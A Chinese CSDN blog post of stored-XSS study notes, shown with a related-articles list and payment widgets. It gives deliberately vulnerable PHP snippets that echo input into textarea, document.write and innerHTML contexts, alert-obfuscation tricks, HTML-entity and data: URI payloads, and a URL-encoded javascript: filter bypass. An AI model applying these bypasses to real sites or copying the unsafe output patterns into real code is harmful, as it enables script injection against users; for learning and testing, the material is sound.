【存储型XSS】

最新推荐文章于 2024-05-29 14:49:51 发布
最新推荐文章于 2024-05-29 14:49:51 发布
阅读量688 收藏 3
点赞数 1
分类专栏: Audit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42322913/article/details/114383005
版权

存储型XSS

在这里插入图片描述

$input =$_GET['inout'];
$code= <<<CODE
	<textarea>$input</textarea>
CODE;

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
===在这里插入图片描述是否使用htmlspecial处理之后就可以避免XSS
在这里插入图片描述

弹窗技巧

常见的小技巧
a=alert(1) ,a(1)
在这里插入图片描述

al\u0065rt(1)

top ‘al\145rt’
top[‘a’+‘l’+‘e’+‘r’+‘t’](12345)
[1].find(alert)

在这里插入图片描述

常见的编码

Html实体编码(以&开头 ;结尾)

不能被浏览器渲染成标签‘
HTML字符编码(10进制,与16进制)
例如 <

html 十进制: &#60;
html 十六进制 &#3C;

Unicode编码的本质就将一个字符对应的16进制前面加上/u
#相当JavaScript执行执行
!在js中,像括号重音符号,引号这些算是控制符号,Unicode编码将不被解析(本质上不允许对他们编码,编码后将无法识别)。
在这里插入图片描述html页面渲染
pre)->要求能够正确的识别标签的结构,比如onerror

  1. 浏览器会对我们的标签节点进行有且仅有一次基于html的解码
  2. 解码之后的结果根据JavaScript的相应的语法进行执行

在html5里面的特殊符号

< a href=“javascript:alert(12345)”>click< /a>
javascript:可编码

& NewLine ; ------->换行 绕过正则
& colon ; ---------->冒号 :

XSS补充

data协议的使用方法:
在这里插入图片描述
在这里插入图片描述

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">111</a>

Objet协议

  • 面试
  • 在这里插入图片描述
<?php

$input = htmlspecialchars($_GET['input']);
$code = <<<CODE
<script>document.write('$input')</script>

CODE;
echo $code;
  • Inner HTML
<html>
<body>
<div id="id">haha</div>
</body>
</html>


<?php

$input = htmlspecialchars($_GET['input']);

$code = <<<CODE
<script>
document.getElementById("id").innerHTML='$input';
</script>

CODE;
echo $code;

URL双写绕过

<?php

$input = htmlspecialchars($_GET['input'], ENT_QUOTES);
preg_match('/alert/i', $input, $matches);
if (!empty( $matches)){
    die("使用了敏感字符");
}
$code = <<<CODE
<a href='$input'>click me </a>
CODE;
echo $code;

http://www.localhost.com/js/tet.php?input=javascript:%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34(12345)
chérie
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
存储xss_安全测试之XSS
weixin_39989159的博客
11-29 1607
安全测试之跨站脚本攻击(XSS)前言随着互联网的不断发展,web应用的互动性也越来越强。但正如一个硬币会有两面一样,在用户体验提升的同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见的一种攻击方式:XSS攻击。(一)什么是XSS攻击先上一段标准解释(摘自百度百科)。“XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style ...
存储Xss成因及挖掘方法
02-21
存储Xss成因及挖掘方法
XSS(跨站脚本攻击)详解
hello
07-02 3866
XSS简述-XSS-XSS常用标签
XSS漏洞原理详解丨小白WEB安全入门
jennycisp的博客
06-27 2023
XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。在检测的开始,可以输入一些敏感字符,比如“、()”等,提交后查看网页源代码的变化以发现输入被输出到什么地方,且可以发现相关敏感字符是否被过滤。
存储XSS
最新发布
2401_84466361的博客
05-29 1044
什么是存储xss:提交恶意xss数据,存入数据库中,访问时触发。存储xss和反射xss区别:存储存入数据库中,可持续时间长,而反射持续时间短,仅对本次访问有影响,反射一般要配合社工。存储xss操作过程:嵌入到了web页面的恶意代码被存储到服务器上,例如你注册时候将用户昵称设置为XSS恶意代码,那么访问某些页面会显示用户名的时候就会触发恶意代码。存储xss可能出现的位置:可以插入数据的地方,比如用户注册,留言板,上传文件的文件名处,管理员可见的报错信息....同源策略。
xss攻击详解
剁椒鱼头没剁椒的博客
11-15 8151
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
XSS漏洞学习小结
dayouzi的博客
08-29 194
XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有Java、VBScript、ActiveX、 Flash或者甚至是普通的HTMLt等,当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。当应用程序没有对用户提交的内容进行验证和重新编码,而是直接呈现给网站的访问者时,就可能会触发XSS攻击,
YXcms-含有存储XSS漏洞的源码包
03-17
"YXcms-含有存储XSS漏洞的源码包" 这个标题揭示了我们要讨论的核心内容。YXcms是一个内容管理系统(CMS),它不幸地包含了存储跨站脚本(Stored XSS)的安全漏洞。存储XSSXSS攻击的一种类,这种漏洞通常...
奇安信安全扫描漏洞解决路径遍历和存储xss和反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
YXcms是一个常见的内容管理系统,但在这个特定的版本——"YXcms-含有存储XSS漏洞的源码包(1).zip"中,存在一个严重的安全问题:存储跨站脚本(Stored Cross-Site Scripting,简称存储XSS)漏洞。这种漏洞允许...
DedeCMS 存储xss漏洞1
08-03
【DedeCMS 存储 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
XSS知识总结
weixin_64051447的博客
04-26 1698
HTML标签 等带src属性的标签都可以跨域加载资源,而不受同源策略的限制。每次加载时都会由浏览器发送一次GET请求,通过src属性加载的资源,浏览器会限制JavaScript的权限,使其不能读写返回的内容。
XSS漏洞
weixin_50340347的博客
06-19 816
xss(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面插入恶意JS代码,这些代码在HTML解释时会被当做脚本执行,所以当用户请求该网页时,嵌入其中JS代码就会被执行,从而达到攻击的目的.
XSS专栏之常见xss--总结备忘
键盘的起始页
02-25 1024
开始总结一些xss的想法。
初识渗透之XSS
2301_79933084的博客
03-28 585
<tr><th>用户</th><th>选择的角色</th><th>评论</th></tr>输入你的评论:<textarea id="comment"></textarea>
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 5589
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
皮卡丘靶场XSS漏洞实战
永远是少年
10-25 1466
今天继续给大家介绍渗透测试相关知识,本文主要内容是皮卡丘靶场XSS漏洞实战。 一、存储XSS 二、反射XSS 三、DOMXSS
存储XSS漏洞
A1956936030的博客
10-21 2706
什么是存储XSS: 攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客,都有可能会执行这段恶意脚本,因此储存XSS的危害会更大。因为存储XSS的代码存在于网页的代码中,可以说是永久的。 1.弹框测试 添加js,选择alert.js 点击生成payload并复制 复制 ...
存储XSS攻击:成因、挖掘与防御策略
存储XSS(跨站脚本攻击)是Web安全领域的一种常见漏洞类,它发生在用户的敏感数据在服务器端被恶意编码并持久地存储于数据库中,然后在后续的用户访问时被读取并执行。这种攻击形式的特点在于,攻击代码不是临时...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值